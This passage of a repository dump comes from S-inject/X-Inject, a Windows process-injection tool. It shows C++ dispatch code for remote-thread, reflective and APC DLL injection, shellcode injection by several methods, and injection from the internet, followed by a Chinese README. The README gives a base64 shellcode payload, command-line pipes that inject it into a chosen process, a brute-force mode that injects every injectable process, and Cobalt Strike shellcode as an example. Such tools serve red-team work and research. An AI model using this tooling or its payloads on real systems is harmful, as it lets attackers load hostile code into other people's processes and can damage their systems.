 73 |                 
 74 |             }
 75 |             else
 76 |                 word.append(1, c);
 77 |         }
 78 |         words.push_back(word);
 79 |         word.clear();
 80 | 
 81 |         std::string method = "";
 82 |         std::string path = "";
 83 |         DWORD pid = 0;
 84 |         std::string procName = "";
 85 |         auto injector = Injector();
 86 | 
 87 |         for (size_t i = 0; i < words.size(); i++) {
 88 |             if (words[i].starts_with("-method")) {
 89 |                 method = words[++i];
 90 |             }
 91 |             else if (words[i].starts_with("-path")) {
 92 |                 path = words[++i];
 93 |             }
 94 |             else if (words[i].starts_with("-pid")) {
 95 |                 pid = std::stoul(words[++i]);
 96 |             }
 97 |             else if (words[i].starts_with("-proc")) {
 98 |                 procName = words[++i];
 99 |             }
100 |         }
101 |         
102 |         
103 |         //std::string report = "method: " + method;
104 |         //report += "\npath: " + path;
105 |         //report += "\nproc: " + procName;
106 |         //report += "\npid:  " + std::to_string(pid);
107 |         //MessageBoxA(NULL, report.c_str(), "debug", MB_OK);
108 | 
109 |         if (!procName.empty())
110 |             pid = injector.getPidByName(procName.c_str());
111 |         if (pid == 0) {
112 |             MessageBoxA(NULL, "No Such Process Can be injected", "error", MB_OK | MB_ICONERROR);
113 |             return 0;
114 |         }
115 | 
116 |         if (method == "net")
117 |             injector.internetInject(pid, path);
118 |         else if (method == "rmtdll") {
119 |             injector.dllPathSetter(path);
120 |             injector.remoteThreadInject(pid);
121 |         }
122 |         else if (method == "refdll") {
123 |             injector.reflectInject(pid);
124 |             injector.remoteThreadInject(pid);
125 |         }
126 |         else if (method == "apcdll") {
127 |             injector.apcInject(pid);
128 |             injector.remoteThreadInject(pid);
129 |         }
130 |         else if (method == "rmtsc")
131 |             injector.shellcodeInject(path, pid);
132 |         else if (method == "apcsc")
133 |             injector.apcShellcodeInject(path, pid);
134 |         else if (method == "ctxsc")
135 |             injector.contextShellcodeInject(path, pid);
136 |         else
137 |             MessageBoxA(NULL, "No Such Method", "error", MB_OK | MB_ICONERROR);
138 | 
139 | 
140 |     }
141 |     else {
142 |         GenConfigIniFile();
143 |         WNDCLASSEXW wc = { };
144 |         wc.cbSize = sizeof(WNDCLASSEX);
145 |         wc.lpfnWndProc = WndProc;
146 |         wc.lpszClassName = L"X-inject";
147 |         //wc.hInstance = instance;
148 | 
149 |         wc.style = CS_HREDRAW | CS_VREDRAW;
150 | 
151 |         ::RegisterClassExW(&wc);
152 |         HWND hwnd = CreateWindowExW(0, L"X-inject", L"X-inject",
153 |             WS_POPUP | WS_EX_TRANSPARENT, CW_USEDEFAULT, CW_USEDEFAULT,
154 |             GetSystemMetrics(SM_CXSCREEN), GetSystemMetrics(SM_CYSCREEN), NULL, NULL, NULL, NULL
155 |         );
156 |         SetWindowLong(hwnd, GWL_EXSTYLE, GetWindowLong(hwnd, GWL_EXSTYLE) | WS_EX_LAYERED);
157 |         SetLayeredWindowAttributes(hwnd, RGB(255, 255, 255), 255, LWA_COLORKEY);
158 |         SetWindowPos(hwnd, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE);
159 | 
160 |         // Initialize Direct3D
161 |         if (!CreateDeviceD3D(hwnd))
162 |         {
163 |             CleanupDeviceD3D();
164 |             ::UnregisterClassW(wc.lpszClassName, wc.hInstance);
165 |             return 1;
166 |         }
167 | 
168 |         // Show the window
169 |         ::ShowWindow(hwnd, SW_SHOWDEFAULT);
170 |         ::UpdateWindow(hwnd);
171 | 
172 |         // Setup context
173 |         //IMGUI_CHECKVERSION();
174 |         ImGui::CreateContext();
175 |         ImGuiIO& io = ImGui::GetIO(); (void)io;
176 |         io.ConfigFlags |= ImGuiConfigFlags_NavEnableKeyboard;     // Enable Keyboard Controls
177 |         io.ConfigFlags |= ImGuiConfigFlags_NavEnableGamepad;      // Enable Gamepad Controls
178 |         io.ConfigFlags |= ImGuiConfigFlags_DockingEnable;         // Enable Docking
179 |         io.ConfigFlags |= ImGuiConfigFlags_ViewportsEnable;       // Enable Multi-Viewport / Platform Windows
180 | 
181 |         // Setup Dear ImGui style
182 |         //ImGui::StyleColorsDark();
183 |         ImGui::StyleColorsLight();
184 |         Theme::purpeDragon();
185 | 
186 |         // When viewports are enabled we tweak WindowRounding/WindowBg so platform windows can look identical to regular ones.
187 |         ImGuiStyle& style = ImGui::GetStyle();
188 |         if (io.ConfigFlags & ImGuiConfigFlags_ViewportsEnable)
189 |         {
190 |             style.WindowRounding = 0.0f;
191 |             style.Colors[ImGuiCol_WindowBg].w = 1.0f;
192 |         }
193 | 
194 |         // Setup Platform/Renderer backends
195 |         ImGui_ImplWin32_Init(hwnd);
196 |         ImGui_ImplDX11_Init(g_pd3dDevice, g_pd3dDeviceContext);
197 | 
198 |         // Load Fonts
199 |         io.Fonts->AddFontFromFileTTF("c:\\Windows\\Fonts\\Deng.ttf", 18, nullptr, io.Fonts->GetGlyphRangesChineseFull());
200 | 
201 | 
202 | 
203 | 
204 |         // Main loop
205 |         bool done = false;
206 |         while (!done)
207 |         {
208 |             // Poll and handle messages (inputs, window resize, etc.)
209 |             // See the WndProc() function below for our to dispatch events to the Win32 backend.
210 |             MSG msg;
211 |             while (::PeekMessage(&msg, nullptr, 0U, 0U, PM_REMOVE))
212 |             {
213 |                 ::TranslateMessage(&msg);
214 |                 ::DispatchMessage(&msg);
215 |                 if (msg.message == WM_QUIT)
216 |                     done = true;
217 |             }
218 |             if (done)
219 |                 break;
220 | 
221 |             // Start the Dear ImGui frame
222 |             ImGui_ImplDX11_NewFrame();
223 |             ImGui_ImplWin32_NewFrame();
224 |             ImGui::NewFrame();
225 | 
226 | 
227 |             ////////////  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS
228 | 
229 |             MainWindow::InitWindow();
230 |             MainWindow::Dispatcher();
231 | 
232 |             ////////////  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS  WINDOWS
233 | 
234 | 
235 | 
236 |             // Rendering
237 |             ImGui::Render();
238 |             // Rendering Method
239 |             const float clear_color_with_alpha[4] = { g_status::clear_color.x * g_status::clear_color.w, g_status::clear_color.y * g_status::clear_color.w,g_status::clear_color.z * g_status::clear_color.w, g_status::clear_color.w };
240 |             g_pd3dDeviceContext->OMSetRenderTargets(1, &g_mainRenderTargetView, nullptr);
241 |             g_pd3dDeviceContext->ClearRenderTargetView(g_mainRenderTargetView, clear_color_with_alpha);
242 |             ImGui_ImplDX11_RenderDrawData(ImGui::GetDrawData());
243 | 
244 |             // Update and Render additional Platform Windows
245 |             if (io.ConfigFlags & ImGuiConfigFlags_ViewportsEnable)
246 |             {
247 |                 ImGui::UpdatePlatformWindows();
248 |                 ImGui::RenderPlatformWindowsDefault();
249 |             }
250 | 
251 |             // Present
252 |             HRESULT hr = g_pSwapChain->Present(1, 0);   // Present with vsync
253 |             //HRESULT hr = g_pSwapChain->Present(0, 0); // Present without vsync
254 |             g_SwapChainOccluded = (hr == DXGI_STATUS_OCCLUDED);
255 |         }
256 | 
257 |         // Cleanup
258 |         ImGui_ImplDX11_Shutdown();
259 |         ImGui_ImplWin32_Shutdown();
260 |         ImGui::DestroyContext();
261 | 
262 |         CleanupDeviceD3D();
263 |         ::DestroyWindow(hwnd);
264 |         ::UnregisterClassW(wc.lpszClassName, wc.hInstance);
265 | 
266 |     }
267 |    
268 |     return 0;
269 | }
270 | 
271 | // Helper functions
272 | void GenConfigIniFile() {
273 |     DWORD attrib = GetFileAttributesA("imgui.ini");
274 |     if (attrib != INVALID_FILE_ATTRIBUTES) {
275 |         return;
276 |     }
277 |     else {
278 |         std::ofstream file("imgui.ini",std::ios::binary);
279 |         if (!file.is_open())
280 |             return;
281 |         file << "[Window][Debug##Default]\n";
282 |         file << "Pos=60,60\n";
283 |         file << "Size=400,400\n";
284 |         file << "Collapsed=0\n";
285 | 
286 |         file << "[Window][Hello, world!]\n";
287 |         file << "Pos=1038,449\n";
288 |         file << "Size=494,422\n";
289 |         file << "Collapsed=0\n";
290 | 
291 |         file << "[Window][Another Window]\n";
292 |         file << "Pos=701,395\n";
293 |         file << "Size=404,360\n";
294 |         file << "Collapsed=0\n";
295 |         file << "DockId=0x00000002,1\n";
296 | 
297 |         file << "[Window][���]\n";
298 |         file << "Pos=631,519\n";
299 |         file << "Size=583,286\n";
300 |         file << "Collapsed=0\n";
301 | 
302 |         file << "[Window][你好]\n";
303 |         file << "Pos=701,395\n";
304 |         file << "Size=404,360\n";
305 |         file << "Collapsed=0\n";
306 |         file << "DockId=0x00000002,0\n";
307 | 
308 |         file << "[Window][S-inject GUI Version]\n";
309 |         file << "Pos=639,321\n";
310 |         file << "Size=543,339\n";
311 |         file << "Collapsed=0\n";
312 |         file << "DockId=0x00000005,0\n";
313 | 
314 |         file << "[Window][Remote DLL Inject]\n";
315 |         file << "Pos=592,734\n";
316 |         file << "Size=774,120\n";
317 |         file << "Collapsed=0\n";
318 |         file << "DockId=0x0000000A,3\n";
319 | 
320 |         file << "[Window][Reflect DLL Inject]\n";
321 |         file << "Pos=592,734\n";
322 |         file << "Size=774,120\n";
323 |         file << "Collapsed=0\n";
324 |         file << "DockId=0x0000000A,2\n";
325 | 
326 |         file << "[Window][APC DLL Inject]\n";
327 |         file << "Pos=592,734\n";
328 |         file << "Size=774,120\n";
329 |         file << "Collapsed=0\n";
330 |         file << "DockId=0x0000000A,1\n";
331 | 
332 |         file << "[Window][Remote Shellcode Inject]\n";
333 |         file << "Pos=592,734\n";
334 |         file << "Size=774,120\n";
335 |         file << "Collapsed=0\n";
336 |         file << "DockId=0x0000000A,1\n";
337 | 
338 |         file << "[Window][APC Shellcode Inject]\n";
339 |         file << "Pos=592,734\n";
340 |         file << "Size=774,120\n";
341 |         file << "Collapsed=0\n";
342 |         file << "DockId=0x0000000A,0\n";
343 | 
344 |         file << "[Window][Context Shellcode Inject]\n";
345 |         file << "Pos=592,708\n";
346 |         file << "Size=774,146\n";
347 |         file << "Collapsed=0\n";
348 | 
349 |         file << "[Window][UnInject DLL]\n";
350 |         file << "Pos=592,322\n";
351 |         file << "Size=365,384\n";
352 |         file << "Collapsed=0\n";
353 |         file << "DockId=0x00000005,1\n";
354 | 
355 |         file << "[Window][Injectable Process]\n";
356 |         file << "Pos=959,322\n";
357 |         file << "Size=407,384\n";
358 |         file << "Collapsed=0\n";
359 |         file << "DockId=0x00000003,0\n";
360 | 
361 |         file << "[Window][S-inject x64]\n";
362 |         file << "Pos=592,322\n";
363 |         file << "Size=389,410\n";
364 |         file << "Collapsed=0\n";
365 |         file << "DockId=0x00000005,0\n";
366 | 
367 |         file << "[Window][pid]\n";
368 |         file << "ViewportPos=60,60\n";
369 |         file << "ViewportId=0x5550C4ED\n";
370 |         file << "Size=635,1034\n";
371 |         file << "Collapsed=0\n";
372 | 
373 |         file << "[Window][process id]\n";
374 |         file << "Pos=983,322\n";
375 |         file << "Size=383,410\n";
376 |         file << "Collapsed=0\n";
377 |         file << "DockId=0x00000006,0\n";
378 | 
379 |         file << "[Window][S-inject x32]\n";
380 |         file << "Pos=375,464\n";
381 |         file << "Size=404,370\n";
382 |         file << "Collapsed=0\n";
383 |         file << "DockId=0x00000005,0\n";
384 | 
385 |         file << "[Window][Inject From Internet]\n";
386 |         file << "Pos=592,734\n";
387 |         file << "Size=774,120\n";
388 |         file << "Collapsed=0\n";
389 |         file << "DockId=0x0000000A,0\n";
390 | 
391 |         file << "[Window][shellcode process id]\n";
392 |         file << "Pos=981,322\n";
393 |         file << "Size=385,410\n";
394 |         file << "Collapsed=0\n";
395 |         file << "DockId=0x00000008,0\n";
396 | 
397 |         file << "[Docking][Data]\n";
398 |         file << "DockNode          ID=0x00000002 Pos=701,395 Size=404,360 Selected=0x96791837\n";
399 |         file << "DockNode          ID=0x00000007 Pos=592,322 Size=774,532 Split=Y\n";
400 |         file << "DockNode        ID=0x00000009 Parent=0x00000007 SizeRef=774,410 Split=X\n";
401 |         file << "DockNode      ID=0x00000001 Parent=0x00000009 SizeRef=415,177 Split=X\n";
402 |         file << "DockNode    ID=0x00000004 Parent=0x00000001 SizeRef=232,533 Split=X Selected=0xD3F790C7\n";
403 |         file << "DockNode  ID=0x00000005 Parent=0x00000004 SizeRef=387,410 Selected=0xD3F790C7\n";
404 |         file << "DockNode  ID=0x00000008 Parent=0x00000004 SizeRef=385,410 Selected=0xB3407F9B\n";
405 |         file << "DockNode    ID=0x00000006 Parent=0x00000001 SizeRef=229,533 Selected=0x8AC5C89D\n";
406 |         file << "DockNode      ID=0x00000003 Parent=0x00000009 SizeRef=462,177 Selected=0x8E2C745A\n";
407 |         file << "DockNode        ID=0x0000000A Parent=0x00000007 SizeRef=774,120 Selected=0x7F6CE61D\n";
408 | 
409 | 
410 |         file.close();
411 |     }
412 | }
413 | 
414 | bool CreateDeviceD3D(HWND hWnd)
415 | {
416 |     // Setup swap chain
417 |     DXGI_SWAP_CHAIN_DESC sd;
418 |     ZeroMemory(&sd, sizeof(sd));
419 |     sd.BufferCount = 2;
420 |     sd.BufferDesc.Width = 0;
421 |     sd.BufferDesc.Height = 0;
422 |     sd.BufferDesc.Format = DXGI_FORMAT_R8G8B8A8_UNORM;
423 |     sd.BufferDesc.RefreshRate.Numerator = 60;
424 |     sd.BufferDesc.RefreshRate.Denominator = 1;
425 |     sd.Flags = DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH;
426 |     sd.BufferUsage = DXGI_USAGE_RENDER_TARGET_OUTPUT;
427 |     sd.OutputWindow = hWnd;
428 |     sd.SampleDesc.Count = 1;
429 |     sd.SampleDesc.Quality = 0;
430 |     sd.Windowed = TRUE;
431 |     sd.SwapEffect = DXGI_SWAP_EFFECT_DISCARD;
432 | 
433 |     UINT createDeviceFlags = 0;
434 |     //createDeviceFlags |= D3D11_CREATE_DEVICE_DEBUG;
435 |     D3D_FEATURE_LEVEL featureLevel;
436 |     const D3D_FEATURE_LEVEL featureLevelArray[2] = { D3D_FEATURE_LEVEL_11_0, D3D_FEATURE_LEVEL_10_0, };
437 |     HRESULT res = D3D11CreateDeviceAndSwapChain(nullptr, D3D_DRIVER_TYPE_HARDWARE, nullptr, createDeviceFlags, featureLevelArray, 2, D3D11_SDK_VERSION, &sd, &g_pSwapChain, &g_pd3dDevice, &featureLevel, &g_pd3dDeviceContext);
438 |     if (res == DXGI_ERROR_UNSUPPORTED) // Try high-performance WARP software driver if hardware is not available.
439 |         res = D3D11CreateDeviceAndSwapChain(nullptr, D3D_DRIVER_TYPE_WARP, nullptr, createDeviceFlags, featureLevelArray, 2, D3D11_SDK_VERSION, &sd, &g_pSwapChain, &g_pd3dDevice, &featureLevel, &g_pd3dDeviceContext);
440 |     if (res != S_OK)
441 |         return false;
442 | 
443 |     CreateRenderTarget();
444 |     return true;
445 | }
446 | 
447 | void CleanupDeviceD3D()
448 | {
449 |     CleanupRenderTarget();
450 |     if (g_pSwapChain) { g_pSwapChain->Release(); g_pSwapChain = nullptr; }
451 |     if (g_pd3dDeviceContext) { g_pd3dDeviceContext->Release(); g_pd3dDeviceContext = nullptr; }
452 |     if (g_pd3dDevice) { g_pd3dDevice->Release(); g_pd3dDevice = nullptr; }
453 | }
454 | 
455 | void CreateRenderTarget()
456 | {
457 |     ID3D11Texture2D* pBackBuffer;
458 |     g_pSwapChain->GetBuffer(0, IID_PPV_ARGS(&pBackBuffer));
459 |     g_pd3dDevice->CreateRenderTargetView(pBackBuffer, nullptr, &g_mainRenderTargetView);
460 |     pBackBuffer->Release();
461 | }
462 | 
463 | void CleanupRenderTarget()
464 | {
465 |     if (g_mainRenderTargetView) { g_mainRenderTargetView->Release(); g_mainRenderTargetView = nullptr; }
466 | }
467 | 
468 | #ifndef WM_DPICHANGED
469 | #define WM_DPICHANGED 0x02E0 // From Windows SDK 8.1+ headers
470 | #endif
471 | 
472 | // Forward declare message handler from imgui_impl_win32.cpp
473 | extern IMGUI_IMPL_API LRESULT ImGui_ImplWin32_WndProcHandler(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam);
474 | 
475 | // Win32 message handler
476 | // You can read the io.WantCaptureMouse, io.WantCaptureKeyboard flags to tell if dear imgui wants to use your inputs.
477 | // - When io.WantCaptureMouse is true, do not dispatch mouse input data to your main application, or clear/overwrite your copy of the mouse data.
478 | // - When io.WantCaptureKeyboard is true, do not dispatch keyboard input data to your main application, or clear/overwrite your copy of the keyboard data.
479 | // Generally you may always pass all inputs to dear imgui, and hide them from your application based on those two flags.
480 | LRESULT WINAPI WndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
481 | {
482 |     if (ImGui_ImplWin32_WndProcHandler(hWnd, msg, wParam, lParam))
483 |         return true;
484 | 
485 |     switch (msg)
486 |     {
487 |     case WM_SIZE:
488 |         if (wParam == SIZE_MINIMIZED)
489 |             return 0;
490 |         g_ResizeWidth = (UINT)LOWORD(lParam); // Queue resize
491 |         g_ResizeHeight = (UINT)HIWORD(lParam);
492 |         return 0;
493 |     case WM_SYSCOMMAND:
494 |         if ((wParam & 0xfff0) == SC_KEYMENU) // Disable ALT application menu
495 |             return 0;
496 |         break;
497 |     case WM_DESTROY:
498 |         ::PostQuitMessage(0);
499 |         return 0;
500 |     case WM_DPICHANGED:
501 |         if (ImGui::GetIO().ConfigFlags & ImGuiConfigFlags_DpiEnableScaleViewports)
502 |         {
503 |             //const int dpi = HIWORD(wParam);
504 |             //printf("WM_DPICHANGED to %d (%.0f%%)\n", dpi, (float)dpi / 96.0f * 100.0f);
505 |             const RECT* suggested_rect = (RECT*)lParam;
506 |             ::SetWindowPos(hWnd, nullptr, suggested_rect->left, suggested_rect->top, suggested_rect->right - suggested_rect->left, suggested_rect->bottom - suggested_rect->top, SWP_NOZORDER | SWP_NOACTIVATE);
507 |         }
508 |         break;
509 |     }
510 |     return ::DefWindowProcW(hWnd, msg, wParam, lParam);
511 | }
512 | 
513 | 
514 | 
515 | 
516 | 
517 | 
518 | 


--------------------------------------------------------------------------------
/X-Inject/resource.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/resource.h


--------------------------------------------------------------------------------
/X-Inject/test.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/test.dll


--------------------------------------------------------------------------------
/bin/InjectLib_x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/bin/InjectLib_x64.dll


--------------------------------------------------------------------------------
/bin/InjectLib_x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/bin/InjectLib_x86.dll


--------------------------------------------------------------------------------
/bin/S-Inject_x64_gui.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/bin/S-Inject_x64_gui.exe


--------------------------------------------------------------------------------
/bin/S-Inject_x86_gui.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/bin/S-Inject_x86_gui.exe


--------------------------------------------------------------------------------
/bin/S-inject_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/bin/S-inject_x64.exe


--------------------------------------------------------------------------------
/bin/S-inject_x86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/bin/S-inject_x86.exe


--------------------------------------------------------------------------------
/old_README.assets/image-20240205125036362.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240205125036362.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240205131316348.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240205131316348.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240205131438254.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240205131438254.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240205135210534.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240205135210534.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240205135709302.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240205135709302.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240205140305351.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240205140305351.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240205140815069.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240205140815069.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240401105145205.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240401105145205.png


--------------------------------------------------------------------------------
/old_README.assets/image-20240401105329537.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/old_README.assets/image-20240401105329537.png


--------------------------------------------------------------------------------
/old_README.md:
--------------------------------------------------------------------------------
  1 | # 1.x版本使用步骤
  2 | 
  3 | 非交互式终端使用管道传参
  4 | 
  5 | - 注意cmd和powershell的区别
  6 | - 注意cmd字符串超过80个会自动换行，推荐搭配powershell
  7 | 
  8 | ## 一般步骤
  9 | 
 10 | 1. 运行程序
 11 | 2. 输入7，遍历出能被注入的进程的pid
 12 | 3. 选择你的注入方式
 13 | 
 14 | ## DLL自动注入/遍历注入
 15 | 
 16 | - 自动注入
 17 | 
 18 |   DLL注入的功能中输入让`pid=0`，如果遇到一个能够被注入的进程那么就会注入，成功注入可能性低
 19 | 
 20 |   ![image-20240401105145205](./old_README.assets/image-20240401105145205.png)
 21 | 
 22 | - 暴力注入- **可能对系统造成损害**
 23 | 
 24 |   `S-inject.exe <任意值>`，确保启动参数`argc`等于2
 25 | 
 26 |   DLL注入的功能中输入让`pid=0`
 27 | 
 28 |   程序遍历所有可被注入程序，对每一个能被注入的进程进行DLL注入
 29 | 
 30 |   ![image-20240401105329537](./old_README.assets/image-20240401105329537.png)
 31 | 
 32 | ## Shellcode注入
 33 | 
 34 | 这里以64为windows10版本Calc shellcode位例子(虽然会崩溃)
 35 | shellcode来源：https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode
 36 | base64编码后shellcode
 37 | 
 38 | ```c
 39 | SDH/SPfnZUiLWGBIi1sYSItbIEiLG0iLG0iLWyBJidiLWzxMAcNIMclmgcH/iEjB6QiLFAtMAcJNMdJEi1IcTQHCTTHbRItaIE0Bw00x5ESLYiRNAcTrMltZSDHASIniUUiLDCRIMf9BizyDTAHHSInW86Z0BUj/wOvmWWZBiwREQYsEgkwBwFPDSDHJgMEHSLgPqJaRuoeanEj30EjB6AhQUeiw////SYnGSDHJSPfhUEi4nJ6TnNGah5pI99BQSInhSP/CSIPsIEH/1g==
 40 | ```
 41 | 
 42 | ![image-20240205135709302](./old_README.assets/image-20240205135709302.png)
 43 | 
 44 | 以CobaltStrike Shellcode为例子
 45 | 
 46 | ![image-20240205140305351](./old_README.assets/image-20240205140305351.png)
 47 | 
 48 | ### 关于使用不可交互终端
 49 | 
 50 | 可以参考 DLL注入：B, 不可交互终端 部分，尝试利用管道加载
 51 | 
 52 | ```powershell
 53 | #cmd
 54 | (echo <option> <base64 Shellcode>) | <S-inject Path>
 55 | 
 56 | #powershell
 57 | echo "<option index>`n`<pid>`n`<base64 Shellcode>" | <S-inject Path>
 58 | 
 59 | #(echo 4`n`16900`n`SDH/SPfnZUiLWGBIi1sYSItbIEiLG0iLG0iLWyBJidiLWzxMAcNIMclmgcH/iEjB6QiLFAtMAcJNMdJEi1IcTQHCTTHbRItaIE0Bw00x5ESLYiRNAcTrMltZSDHASIniUUiLDCRIMf9BizyDTAHHSInW86Z0BUj/wOvmWWZBiwREQYsEgkwBwFPDSDHJgMEHSLgPqJaRuoeanEj30EjB6AhQUeiw////SYnGSDHJSPfhUEi4nJ6TnNGah5pI99BQSInhSP/CSIPsIEH/1g==) |  D:\Github\S-inject\x64\Release\S-inject.exe
 60 | ```
 61 | 
 62 | ![image-20240205140815069](./old_README.assets/image-20240205140815069.png)
 63 | 
 64 | ## DLL注入
 65 | 
 66 | ### A, 可交互终端
 67 | 
 68 | 直接在终端中启动，根据菜单选择功能即可，如枚举可注入进程
 69 | 
 70 | ![image-20240205125036362](./old_README.assets/image-20240205125036362.png)
 71 | 
 72 | ### B, 不可交互终端
 73 | 
 74 | 因为作者不想增加代码量，单独增添没有必要的参数功能，可以利用管道解决该问题
 75 | 以下示例使用的注入对象更新前的为`x32dbg`和`x64dbg`，因为一个软件有两个位数的版本，在`x96dbg`中可以选择位数，便于测试
 76 | 
 77 | **如远程线程DLL注入**
 78 | 
 79 | x64
 80 | 
 81 | - powershell
 82 | 
 83 |   ```powershell
 84 |   echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>
 85 |   
 86 |   #echo "1`n`D:\Github\S-inject\Test Files\TestDll_x64.dll`n`20176" | D:\Github\S-inject\x64\Release\S-inject.exe
 87 |   ```
 88 | 
 89 |   ![image-20240205131438254](./old_README.assets/image-20240205131438254.png)
 90 | 
 91 | - cmd
 92 | 
 93 |   推荐使用powershell启动
 94 | 
 95 |   ```powershell
 96 |   powershell -c echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>
 97 |   
 98 |   #powershell -c echo "1`n`D:\Github\S-inject\Test Files\TestDll_x64.dll`n`20176" | D:\Github\S-inject\x64\Release\S-inject.exe
 99 |   ```
100 | 
101 |   ![image-20240205131316348](./old_README.assets/image-20240205131316348.png)
102 | 
103 |   cmd.exe
104 | 
105 |   ```
106 |   (echo <option> <DLL Path> &echo <PID>) | <S-inject Path>
107 |   
108 |   #(echo 1 D:\Github\S-inject\Test Files\TestDll_x64.dll &echo 22268) | D:\Github\S-inject\x64\Release\S-inject.exe
109 |   ```
110 | 
111 |   ![image-20240205135210534](./old_README.assets/image-20240205135210534.png)
112 | 
113 | 
114 | 
115 | 
116 | 
117 | 
118 | 
119 | 
120 | 
121 | 


--------------------------------------------------------------------------------